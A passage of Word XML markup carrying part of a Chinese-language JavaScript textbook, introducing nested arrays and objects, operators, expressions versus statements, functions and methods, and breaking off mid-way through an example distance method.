    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>数组和对象中都可以包含另一个数组或对象</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var points=[//</w:t>
      </w:r>
      <w:r>
        <w:t>具有两个元素的数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>{x:0,y:0},//</w:t>
      </w:r>
      <w:r>
        <w:t>每个元素都是一个对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>{x:1,y:1}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var data={//</w:t>
      </w:r>
      <w:r>
        <w:t>一个包含两个属性的对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>trial1:[[1,2],[3,4]],//</w:t>
      </w:r>
      <w:r>
        <w:t>每一个属性都是数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>trial2:[[2,3],[4,5]]//</w:t>
      </w:r>
      <w:r>
        <w:t>数组的元素也是数组</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上段代码中通过方括号定义数组元素和通过花括号定义对象属性名和属性值之间的</w:t>
      </w:r>
      <w:r>
        <w:t>映射关系的语法称为初始化表达式（</w:t>
      </w:r>
      <w:r>
        <w:t>initializer expression</w:t>
      </w:r>
      <w:r>
        <w:t>），第</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>章有专门的介绍。表达式是</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的一个短语，这个短语可以通过运算得出一个值。通过</w:t>
      </w:r>
      <w:r>
        <w:t>“.”</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>“[]”</w:t>
      </w:r>
      <w:r>
        <w:t>来引用对象属性或数组元素的值就构成一个表达式。比如，请看一下上述代码中独占一行的表达式，其后的注释中箭头（</w:t>
      </w:r>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:t>＞）后的值就是表达式的运算结果。这种写法是本书中的一种约定表述方式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中最常见的表达式写法是像下面代码这样使用运算符（</w:t>
      </w:r>
      <w:r>
        <w:t>operator</w:t>
      </w:r>
      <w:r>
        <w:t>）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>运算符作用于操作数，生成一个新的值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>最常</w:t>
      </w:r>
      <w:r>
        <w:t>见的是算术运算符</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>3+2//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>5:</w:t>
      </w:r>
      <w:r>
        <w:t>加法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>3-2//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>1:</w:t>
      </w:r>
      <w:r>
        <w:t>减法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>3*2//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>6:</w:t>
      </w:r>
      <w:r>
        <w:t>乘法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>3/2//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>1.5:</w:t>
      </w:r>
      <w:r>
        <w:t>除法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>points[1].x-points[0].x//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>1:</w:t>
      </w:r>
      <w:r>
        <w:t>更复杂的操作数也能照常工作</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"3"+"2"//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"32":+</w:t>
      </w:r>
      <w:r>
        <w:t>可以完成加法运算也可以作字符串连接</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>//JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>定义了一些算术运算符的简写形式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var count=0;//</w:t>
      </w:r>
      <w:r>
        <w:t>定义一个变量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>count++;//</w:t>
      </w:r>
      <w:r>
        <w:t>自增</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>count--;//</w:t>
      </w:r>
      <w:r>
        <w:t>自减</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>count+=2;//</w:t>
      </w:r>
      <w:r>
        <w:t>自增</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>：和</w:t>
      </w:r>
      <w:r>
        <w:t>"count=count+2;"</w:t>
      </w:r>
      <w:r>
        <w:t>写法一样</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>count*=3;//</w:t>
      </w:r>
      <w:r>
        <w:t>自乘</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>：和</w:t>
      </w:r>
      <w:r>
        <w:t>"count=count*3;"</w:t>
      </w:r>
      <w:r>
        <w:t>写法一样</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>count//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>6:</w:t>
      </w:r>
      <w:r>
        <w:t>变量名本身也是一个表达式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>相等关系运算符用来判断两值是否相等</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>不等、大于、小于运算符的运算结果是</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var x=2,y=3;//</w:t>
      </w:r>
      <w:r>
        <w:t>这里的</w:t>
      </w:r>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:t>等号是赋值的意思，不是比较相等</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>x==y//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>false:</w:t>
      </w:r>
      <w:r>
        <w:t>相等</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>x!=y//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>true:</w:t>
      </w:r>
      <w:r>
        <w:t>不等</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>y//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>true:</w:t>
      </w:r>
      <w:r>
        <w:t>小于</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>=y//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>true:</w:t>
      </w:r>
      <w:r>
        <w:t>小于等于</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>y//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>false:</w:t>
      </w:r>
      <w:r>
        <w:t>大于等于</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>=y//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>false:</w:t>
      </w:r>
      <w:r>
        <w:t>大于等于</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"two"=="</w:t>
      </w:r>
      <w:r>
        <w:t>three"//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>false:</w:t>
      </w:r>
      <w:r>
        <w:t>两个字符串不相等</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"two"</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"three"//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>true:"tw"</w:t>
      </w:r>
      <w:r>
        <w:t>在字母表中的索引大于</w:t>
      </w:r>
      <w:r>
        <w:t>"th"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>false==(x</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>y)//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>true:false</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>相等</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>逻辑运算符是对布尔值的合并或求反</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>(x==2)</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>(y==3)//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>true:</w:t>
      </w:r>
      <w:r>
        <w:t>两个比较都是</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，＆＆表示</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>(x</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>3)||(y</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>3)//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>false:</w:t>
      </w:r>
      <w:r>
        <w:t>两个比较不都是</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>||</w:t>
      </w:r>
      <w:r>
        <w:t>表示</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>!(x==y)//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>true:!</w:t>
      </w:r>
      <w:r>
        <w:t>求反</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>短语</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>是表达式的话，那么整个句子</w:t>
      </w:r>
      <w:r>
        <w:t>就称做语句（</w:t>
      </w:r>
      <w:r>
        <w:t>statement</w:t>
      </w:r>
      <w:r>
        <w:t>），第</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>章会详细讲解。在上述代码中，以分号结束的行均是一条语句（下面的代码中，会看到省略分号的多行语句）。实际上，语句和表达式之间有很多共同之处，粗略地讲，表达式仅仅计算出一个值但并不作任何操作，它并不改变程序的运行状态。而语句并不包含一个值（或者说它包含的值我们并不关心），但它们改变程序的运行状态。在上文中已经见过变量声明语</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>句和赋值语句。另一类语句是</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>控制结构</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>control structure</w:t>
      </w:r>
      <w:r>
        <w:t>），比如条件判断和循环。在介绍完函数之后，我们给出相关的示例代码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>函数是带有名</w:t>
      </w:r>
      <w:r>
        <w:t>称（</w:t>
      </w:r>
      <w:r>
        <w:t>named</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r>
        <w:t>和参数的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码段，可以一次定义多次调用。第</w:t>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>章会正式详细地讲解函数。与对象和数组一样，在本书的很多地方都会提到函数。这里是一些简单的示例代码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>函数是一段带有参数的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码端，可以多次调用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function plus1(x){//</w:t>
      </w:r>
      <w:r>
        <w:t>定义了名为</w:t>
      </w:r>
      <w:r>
        <w:t>plus1</w:t>
      </w:r>
      <w:r>
        <w:t>的一个函数，带有参数</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return x+1;//</w:t>
      </w:r>
      <w:r>
        <w:t>返回一个比传入的参数大的值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>函数的代码块是由花括号包裹起来的部分</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>plus1(y)//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>4:y</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>，调用函数的结果为</w:t>
      </w:r>
      <w:r>
        <w:t>3+1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:r>
        <w:t>square=function(x){//</w:t>
      </w:r>
      <w:r>
        <w:t>函数是一种值，可以赋值给变量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return x*x;//</w:t>
      </w:r>
      <w:r>
        <w:t>计算函数的值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>分号标识了赋值语句的结束</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>square(plus1(y))//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>16:</w:t>
      </w:r>
      <w:r>
        <w:t>在一个表达式中调用两个函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当将函数和对象合写在一起时，函数就变成了</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>method</w:t>
      </w:r>
      <w:r>
        <w:t>）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>当函数赋值给对象的属性，我们称为</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//"</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>，所有的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>对象都含有方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var a=[];//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个空数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.push(1,2,3);//push()</w:t>
      </w:r>
      <w:r>
        <w:t>方法向数组中添加元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.reverse()</w:t>
      </w:r>
      <w:r>
        <w:t>;//</w:t>
      </w:r>
      <w:r>
        <w:t>另一个方法：将数组元素的次序反转</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>我们也可以定义自己的方法，</w:t>
      </w:r>
      <w:r>
        <w:t>"this"</w:t>
      </w:r>
      <w:r>
        <w:t>关键字是对定义方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>的对象的引用：这里的例子是上文中提到的包含两个点位置信息的数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>points.dist=function(){//</w:t>
      </w:r>
      <w:r>
        <w:t>定义一个方法用来计算两点之间的距离</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var p1=this[0];//</w:t>
      </w:r>
      <w:r>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>获得对当前数组的引用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var p2=this[1];//</w:t>
      </w:r>
      <w:r>
        <w:t>并取得调用的数组前两个元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var a=p2.x-p1.x;//X</w:t>
      </w:r>
      <w:r>
        <w:t>坐标轴上的距离</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var b=p2.y-p1.y;//Y</w:t>
      </w:r>
      <w:r>
        <w:t>坐标轴上的距离</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return Ma</w:t>
      </w:r>
      <w:r>
        <w:t>th.sqrt(a*a+//</w:t>
      </w:r>
      <w:r>
        <w:t>勾股定理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
